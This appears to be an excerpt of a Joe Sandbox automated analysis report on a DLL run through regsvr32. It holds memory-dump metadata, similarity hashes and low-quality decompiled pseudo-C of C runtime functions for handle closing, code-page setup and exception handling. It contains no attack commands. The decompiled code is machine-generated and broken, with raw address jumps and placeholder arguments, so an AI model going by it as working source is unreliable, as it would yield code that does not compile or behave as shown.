                                                  • API String ID: 2123368286-577066449
                                                  • Opcode ID: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                  • Instruction ID: 02d1b78a9e545c30370c255a3c9a69dd209a03738a12318584891449022be9b6
                                                  • Opcode Fuzzy Hash: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                  • Instruction Fuzzy Hash: 8F017831E0C64ACAF7E08B54EC847AD26E0F794394FB09535A6DD466F8CB7EE5448B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 1646373207-1276376045
                                                  • Opcode ID: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                  • Instruction ID: 7d77de13c6c7ff31230b68e177806ee2c45e09dad43843c6dfa61805c8a48305
                                                  • Opcode Fuzzy Hash: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                  • Instruction Fuzzy Hash: 97F0AC32918A4282D674DB18F94836DB7F0F388348F644125D6CE42678DF3ED559CA04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 41%
                                                  			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
                                                  				signed long long _v16;
                                                  				long _v24;
                                                  				void* _t57;
                                                  				signed long long _t59;
                                                  
                                                  				_t57 = __rax;
                                                  				_a8 = __ecx;
                                                  				E000007FE7FEF9D3F900(_a8);
                                                  				if (_t57 == 0xffffffff) goto 0xf9d40d05;
                                                  				if (_a8 != 1) goto 0xf9d40cb3;
                                                  				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
                                                  				if (_a8 != 2) goto 0xf9d40cef;
                                                  				_t59 =  *0xf9d4e560;
                                                  				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
                                                  				E000007FE7FEF9D3F900(1);
                                                  				_v16 = _t59;
                                                  				E000007FE7FEF9D3F900(2);
                                                  				if (_v16 == _t59) goto 0xf9d40d05;
                                                  				E000007FE7FEF9D3F900(_a8);
                                                  				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
                                                  				_v24 = 0;
                                                  				goto 0xf9d40d19;
                                                  				_v24 = GetLastError();
                                                  				E000007FE7FEF9D3F7D0(_a8, _t59);
                                                  				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
                                                  				if (_v24 == 0) goto 0xf9d40d60;
                                                  				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
                                                  				goto 0xf9d40d62;
                                                  				return 0;
                                                  			}







                                                  0x7fef9d40c80
                                                  0x7fef9d40c80
                                                  0x7fef9d40c8c
                                                  0x7fef9d40c95
                                                  0x7fef9d40c9c
                                                  0x7fef9d40cb1
                                                  0x7fef9d40cb8
                                                  0x7fef9d40cba
                                                  0x7fef9d40cca
                                                  0x7fef9d40cd1
                                                  0x7fef9d40cd6
                                                  0x7fef9d40ce0
                                                  0x7fef9d40ced
                                                  0x7fef9d40cf3
                                                  0x7fef9d40d03
                                                  0x7fef9d40d05
                                                  0x7fef9d40d0d
                                                  0x7fef9d40d15
                                                  0x7fef9d40d1d
                                                  0x7fef9d40d44
                                                  0x7fef9d40d4e
                                                  0x7fef9d40d54
                                                  0x7fef9d40d5e
                                                  0x7fef9d40d66

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                                  • String ID:
                                                  • API String ID: 1551955814-0
                                                  • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                  • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                                  • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                  • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FormatLocaleThread$DateTime
                                                  • String ID:
                                                  • API String ID: 3587784874-0
                                                  • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                  • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                                  • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                  • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 23%
                                                  			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
                                                  				signed int _v24;
                                                  				char _v42;
                                                  				void* _v48;
                                                  				signed int _v56;
                                                  				char _v312;
                                                  				signed char* _v328;
                                                  				char _v584;
                                                  				char _v840;
                                                  				char _v1352;
                                                  				char _v1384;
                                                  				char _v1392;
                                                  				intOrPtr _v1400;
                                                  				long long _v1408;
                                                  				long long _v1416;
                                                  				signed long long _t206;
                                                  				signed char* _t214;
                                                  				signed long long _t223;
                                                  				intOrPtr _t225;
                                                  				intOrPtr _t226;
                                                  				signed long long _t233;
                                                  
                                                  				_t224 = __rcx;
                                                  				_a8 = __rcx;
                                                  				_t206 =  *0xf9d4b018; // 0x6eb881abeeac
                                                  				_v24 = _t206 ^ _t233;
                                                  				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
                                                  				_v56 = 0;
                                                  				goto 0xf9d2a63c;
                                                  				_v56 = _v56 + 1;
                                                  				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
                                                  				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
                                                  				goto 0xf9d2a62c;
                                                  				_v312 = 0x20;
                                                  				_v328 =  &_v42;
                                                  				goto 0xf9d2a68f;
                                                  				_v328 =  &(_v328[2]);
                                                  				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
                                                  				_v56 =  *_v328 & 0x000000ff;
                                                  				goto 0xf9d2a6c2;
                                                  				_v56 = _v56 + 1;
                                                  				_t214 = _v328;
                                                  				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
                                                  				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
                                                  				goto 0xf9d2a6b2;
                                                  				goto 0xf9d2a67b;
                                                  				_v1392 = 0;
                                                  				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
                                                  				_v1408 =  *((intOrPtr*)(_a8 + 4));
                                                  				_v1416 =  &_v1352;
                                                  				r9d = 0x100;
                                                  				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
                                                  				_v1384 = 0;
                                                  				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                  				_v1400 = 0x100;
                                                  				_v1408 =  &_v840;
                                                  				_v1416 = 0x100;
                                                  				r8d = 0x100;
                                                  				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
                                                  				_v1384 = 0;
                                                  				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                  				_v1400 = 0x100;
                                                  				_v1408 =  &_v584;
                                                  				_v1416 = 0x100;
                                                  				r8d = 0x200;
                                                  				_t223 = _a8;
                                                  				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
                                                  				_v56 = 0;
                                                  				_v56 = _v56 + 1;
                                                  				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
                                                  				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
                                                  				_t225 = _a8;
                                                  				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
                                                  				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
                                                  				goto 0xf9d2a8fc;
                                                  				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
                                                  				_t226 = _a8;
                                                  				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
                                                  				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
                                                  				goto 0xf9d2a8fc;
                                                  				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
                                                  				goto L1;
                                                  				goto 0xf9d2aa20;
                                                  				_v56 = 0;
                                                  				_v56 = _v56 + 1;
                                                  				_v56 = _v56 + 1;
                                                  				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
                                                  				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
                                                  				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
                                                  				_v56 = _v56 + 1;
                                                  				__rcx = _a8;
                                                  				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
                                                  				_v56 = _v56 + 1;
                                                  				__rdx = _a8;
                                                  				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                  				_v56 = _v56 + 0x20;
                                                  				__ecx = _v56;
                                                  				__rdx = _a8;
                                                  				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
                                                  				goto 0xf9d2aa1b;
                                                  				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
                                                  				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
                                                  				_v56 = _v56 + 1;
                                                  				__rcx = _a8;
                                                  				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
                                                  				_v56 = _v56 + 1;
                                                  				__rdx = _a8;
                                                  				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                  				_v56 = _v56 - 0x20;
                                                  				__ecx = _v56;
                                                  				__rdx = _a8;
                                                  				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
                                                  				goto 0xf9d2aa1b;
                                                  				__eax = _v56;
                                                  				__rcx = _a8;
                                                  				 *((char*)(_a8 + __rax + 0x11d)) = 0;
                                                  				goto L2;
                                                  				__rcx = _v24;
                                                  				__rcx = _v24 ^ __rsp;
                                                  				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
                                                  			}























                                                  0x7fef9d2a5e0
                                                  0x7fef9d2a5e0
                                                  0x7fef9d2a5ec
                                                  0x7fef9d2a5f6
                                                  0x7fef9d2a619
                                                  0x7fef9d2a61f
                                                  0x7fef9d2a62a
                                                  0x7fef9d2a635
                                                  0x7fef9d2a647
                                                  0x7fef9d2a658
                                                  0x7fef9d2a65f
                                                  0x7fef9d2a661
                                                  0x7fef9d2a671
                                                  0x7fef9d2a679
                                                  0x7fef9d2a687
                                                  0x7fef9d2a69c
                                                  0x7fef9d2a6a9
                                                  0x7fef9d2a6b0
                                                  0x7fef9d2a6bb
                                                  0x7fef9d2a6c2
                                                  0x7fef9d2a6d5
                                                  0x7fef9d2a6de
                                                  0x7fef9d2a6e6
                                                  0x7fef9d2a6e8
                                                  0x7fef9d2a6ea
                                                  0x7fef9d2a6fd
                                                  0x7fef9d2a70c
                                                  0x7fef9d2a715
                                                  0x7fef9d2a71a
                                                  0x7fef9d2a72f
                                                  0x7fef9d2a734
                                                  0x7fef9d2a747
                                                  0x7fef9d2a74b
                                                  0x7fef9d2a75b
                                                  0x7fef9d2a760
                                                  0x7fef9d2a770
                                                  0x7fef9d2a783
                                                  0x7fef9d2a788
                                                  0x7fef9d2a79b
                                                  0x7fef9d2a79f
                                                  0x7fef9d2a7af
                                                  0x7fef9d2a7b4
                                                  0x7fef9d2a7c4
                                                  0x7fef9d2a7ca
                                                  0x7fef9d2a7d7
                                                  0x7fef9d2a7dc
                                                  0x7fef9d2a7f2
                                                  0x7fef9d2a804
                                                  0x7fef9d2a81b
                                                  0x7fef9d2a828
                                                  0x7fef9d2a84b
                                                  0x7fef9d2a86d
                                                  0x7fef9d2a874
                                                  0x7fef9d2a88a
                                                  0x7fef9d2a897
                                                  0x7fef9d2a8ba
                                                  0x7fef9d2a8dc
                                                  0x7fef9d2a8e3
                                                  0x7fef9d2a8f4
                                                  0x7fef9d2a8fc
                                                  0x7fef9d2a901
                                                  0x7fef9d2a906
                                                  0x7fef9d2a91a
                                                  0x7fef9d2a91c
                                                  0x7fef9d2a92e
                                                  0x7fef9d2a93c
                                                  0x7fef9d2a946
                                                  0x7fef9d2a94f
                                                  0x7fef9d2a953
                                                  0x7fef9d2a960
                                                  0x7fef9d2a96a
                                                  0x7fef9d2a96e
                                                  0x7fef9d2a976
                                                  0x7fef9d2a981
                                                  0x7fef9d2a984
                                                  0x7fef9d2a98b
                                                  0x7fef9d2a993
                                                  0x7fef9d2a99a
                                                  0x7fef9d2a9a4
                                                  0x7fef9d2a9ae
                                                  0x7fef9d2a9b7
                                                  0x7fef9d2a9bb
                                                  0x7fef9d2a9c8
                                                  0x7fef9d2a9d2
                                                  0x7fef9d2a9d6
                                                  0x7fef9d2a9de
                                                  0x7fef9d2a9e9
                                                  0x7fef9d2a9ec
                                                  0x7fef9d2a9f3
                                                  0x7fef9d2a9fb
                                                  0x7fef9d2aa02
                                                  0x7fef9d2aa04
                                                  0x7fef9d2aa0b
                                                  0x7fef9d2aa13
                                                  0x7fef9d2aa1b
                                                  0x7fef9d2aa20
                                                  0x7fef9d2aa28
                                                  0x7fef9d2aa37

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID: $z
                                                  • API String ID: 1807457897-2251613814
                                                  • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                  • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                                  • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                  • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 35%
                                                  			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
                                                  				long long _v24;
                                                  				long long _v32;
                                                  				long long _v40;
                                                  				long long _v48;
                                                  				long long _v56;
                                                  				char _v60;
                                                  				char _v64;
                                                  				signed int _v72;
                                                  				char _v80;
                                                  				char _v88;
                                                  				long long _v96;
                                                  				intOrPtr _v104;
                                                  				long long _v112;
                                                  				long long _v120;
                                                  				long long _v128;
                                                  				signed int _v136;
                                                  				void* _t106;
                                                  				void* _t117;
                                                  				void* _t118;
                                                  				void* _t119;
                                                  				void* _t120;
                                                  				void* _t121;
                                                  				long long _t153;
                                                  				signed int _t161;
                                                  				signed int _t165;
                                                  				long long _t166;
                                                  				long long _t169;
                                                  				long long _t170;
                                                  				intOrPtr _t174;
                                                  
                                                  				_a32 = __r9;
                                                  				_a24 = __r8;
                                                  				_a16 = __rdx;
                                                  				_a8 = __rcx;
                                                  				_t153 = _a8;
                                                  				if ( *_t153 != 0x80000003) goto 0xf9d34990;
                                                  				goto 0xf9d34cc6;
                                                  				0xf9d24000();
                                                  				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
                                                  				0xf9d24000();
                                                  				_v56 = _t153;
                                                  				E000007FE7FEF9D23D00(_t106);
                                                  				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
                                                  				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
                                                  				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
                                                  				_v120 = _a64;
                                                  				_v128 = _a56;
                                                  				_v136 = _a40;
                                                  				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
                                                  				goto 0xf9d34cc6;
                                                  				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
                                                  				goto 0xf9d34a48;
                                                  				E000007FE7FEF9D2CF80(_a40);
                                                  				_v120 = _a32;
                                                  				_v128 =  &_v60;
                                                  				_t161 =  &_v64;
                                                  				_v136 = _t161;
                                                  				r9d = _a48;
                                                  				r8d = _a56;
                                                  				E000007FE7FEF9D2EA30(_a16, _a40);
                                                  				_v72 = _t161;
                                                  				_v64 = _v64 + 1;
                                                  				_v72 = _v72 + 0x14;
                                                  				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
                                                  				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
                                                  				_t165 = _v72;
                                                  				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
                                                  				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
                                                  				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
                                                  				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
                                                  				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
                                                  				_v48 = _t166;
                                                  				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
                                                  				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                  				_v40 = _t169;
                                                  				goto 0xf9d34b5f;
                                                  				_v40 = 0;
                                                  				if (_v40 == 0) goto 0xf9d34bff;
                                                  				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
                                                  				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
                                                  				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
                                                  				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
                                                  				_v32 = _t170;
                                                  				E000007FE7FEF9D2E680(_t121, _t170);
                                                  				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                  				goto 0xf9d34bef;
                                                  				_v24 = 0;
                                                  				_t174 = _v24;
                                                  				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
                                                  				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
                                                  				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
                                                  				goto L1;
                                                  				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                  				_v72 =  *((intOrPtr*)(_v72 + 0x10));
                                                  				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
                                                  				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
                                                  				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                  				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                  				__eflags = __rax;
                                                  				_v80 = 0;
                                                  				_v88 = 1;
                                                  				__rcx = _a64;
                                                  				_v96 = _a64;
                                                  				_v104 = _a56;
                                                  				__rcx = _v72;
                                                  				_v112 = _v72;
                                                  				_v120 = 0;
                                                  				_v128 = __rax;
                                                  				__rax = _a40;
                                                  				_v136 = _a40;
                                                  				__r9 = _a32;
                                                  				__r8 = _a24;
                                                  				__rdx = _a16;
                                                  				__rcx = _a8;
                                                  				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
                                                  				goto L1;
                                                  				return __eax;
                                                  			}
































                                                  0x7fef9d34960
                                                  0x7fef9d34965
                                                  0x7fef9d3496a
                                                  0x7fef9d3496f
                                                  0x7fef9d3497b
                                                  0x7fef9d34989
                                                  0x7fef9d3498b
                                                  0x7fef9d34990
                                                  0x7fef9d3499d
                                                  0x7fef9d349a3
                                                  0x7fef9d349a8
                                                  0x7fef9d349ad
                                                  0x7fef9d349be
                                                  0x7fef9d349ce
                                                  0x7fef9d349de
                                                  0x7fef9d349e8
                                                  0x7fef9d349f4
                                                  0x7fef9d34a00
                                                  0x7fef9d34a2c
                                                  0x7fef9d34a2e
                                                  0x7fef9d34a3f
                                                  0x7fef9d34a41
                                                  0x7fef9d34a43
                                                  0x7fef9d34a50
                                                  0x7fef9d34a5a
                                                  0x7fef9d34a5f
                                                  0x7fef9d34a64
                                                  0x7fef9d34a69
                                                  0x7fef9d34a71
                                                  0x7fef9d34a89
                                                  0x7fef9d34a8e
                                                  0x7fef9d34a9b
                                                  0x7fef9d34aa8
                                                  0x7fef9d34ab5
                                                  0x7fef9d34ac9
                                                  0x7fef9d34acf
                                                  0x7fef9d34ade
                                                  0x7fef9d34ae4
                                                  0x7fef9d34af2
                                                  0x7fef9d34b0b
                                                  0x7fef9d34b0d
                                                  0x7fef9d34b12
                                                  0x7fef9d34b17
                                                  0x7fef9d34b46
                                                  0x7fef9d34b49
                                                  0x7fef9d34b51
                                                  0x7fef9d34b53
                                                  0x7fef9d34b68
                                                  0x7fef9d34b6e
                                                  0x7fef9d34b7c
                                                  0x7fef9d34b95
                                                  0x7fef9d34b97
                                                  0x7fef9d34b9c
                                                  0x7fef9d34ba4
                                                  0x7fef9d34bd9
                                                  0x7fef9d34be1
                                                  0x7fef9d34be3
                                                  0x7fef9d34bef
                                                  0x7fef9d34bfd
                                                  0x7fef9d34bff
                                                  0x7fef9d34c29
                                                  0x7fef9d34c2b
                                                  0x7fef9d34c30
                                                  0x7fef9d34c3a
                                                  0x7fef9d34c3e
                                                  0x7fef9d34c4b
                                                  0x7fef9d34c4e
                                                  0x7fef9d34c52
                                                  0x7fef9d34c52
                                                  0x7fef9d34c55
                                                  0x7fef9d34c5a
                                                  0x7fef9d34c5f
                                                  0x7fef9d34c67
                                                  0x7fef9d34c73
                                                  0x7fef9d34c77
                                                  0x7fef9d34c7c
                                                  0x7fef9d34c81
                                                  0x7fef9d34c8a
                                                  0x7fef9d34c8f
                                                  0x7fef9d34c97
                                                  0x7fef9d34c9c
                                                  0x7fef9d34ca4
                                                  0x7fef9d34cac
                                                  0x7fef9d34cb4
                                                  0x7fef9d34cbc
                                                  0x7fef9d34cc1
                                                  0x7fef9d34ccd

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MOC$RCC
                                                  • API String ID: 0-2084237596
                                                  • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                  • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                                  • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                  • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                                  • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                                  • API String ID: 4112623284-4095683531
                                                  • Opcode ID: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                  • Instruction ID: 45fc69fecf93984735d9c4b87304ebe4c96837b84e7424b4db74fc1719c3d08d
                                                  • Opcode Fuzzy Hash: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                  • Instruction Fuzzy Hash: 83911D36619B8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 19%
                                                  			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                  				signed int _t217;
                                                  				signed char _t222;
                                                  				intOrPtr _t257;
                                                  				signed int _t332;
